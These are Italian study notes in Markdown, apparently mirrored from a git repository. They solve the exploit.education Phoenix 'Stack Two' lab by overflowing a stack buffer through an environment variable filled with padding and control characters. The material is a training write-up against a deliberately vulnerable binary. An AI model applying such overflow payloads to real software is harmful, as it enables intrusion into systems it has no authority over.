mirror of
https://github.com/Steffo99/appunti-magistrali.git
synced 2024-11-22 10:44:17 +00:00
31 lines
905 B
Markdown
31 lines
905 B
Markdown
|
# [Stack Two](https://exploit.education/phoenix/stack-two/)
|
||
|
|
||
|
Il valore desiderato richiede caratteri non stampabili.
|
||
|
|
||
|
Da `bash`:
|
||
|
|
||
|
1. Si usa `printf` per trasformare le escape sequence nei caratteri desiderati:
|
||
|
```bash
|
||
|
printf 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
|
||
|
aaaaaaaaaaaaaaaaaaaaaaaaaaa\n\t\n\r'
|
||
|
```
|
||
|
|
||
|
2. Si usa la command substitution per scrivere i caratteri desiderati nel comando:
|
||
|
```bash
|
||
|
echo $(printf 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\t\n\r')
|
||
|
```
|
||
|
|
||
|
3. Si usa il comando `export` per impostare la variabile d'ambiente al valore desiderato:
|
||
|
```bash
|
||
|
export ExploitEducation=$(printf 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\t\n\r')
|
||
|
```
|
||
|
|
||
|
4. Si esegue il programma da exploitare.
|
||
|
|
||
|
## Soluzione
|
||
|
|
||
|
```bash
|
||
|
export ExploitEducation=$(printf 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\t\n\r')
|
||
|
./stack-two
|
||
|
```
|